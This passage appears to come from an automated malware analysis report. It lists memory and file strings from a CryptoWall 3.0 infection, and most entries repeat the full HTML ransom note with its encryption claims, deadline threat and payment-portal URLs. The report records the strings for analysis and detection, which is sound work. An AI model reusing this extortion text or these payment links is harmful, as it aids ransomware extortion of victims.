not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html283.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt138.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt318.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html253.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html348.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt182.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html41.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt184.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt141.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html25.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html35.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt83.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html60.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt358.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt294.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html198.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html363.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt375.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html105.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt290.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html174.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt74.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html340.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, 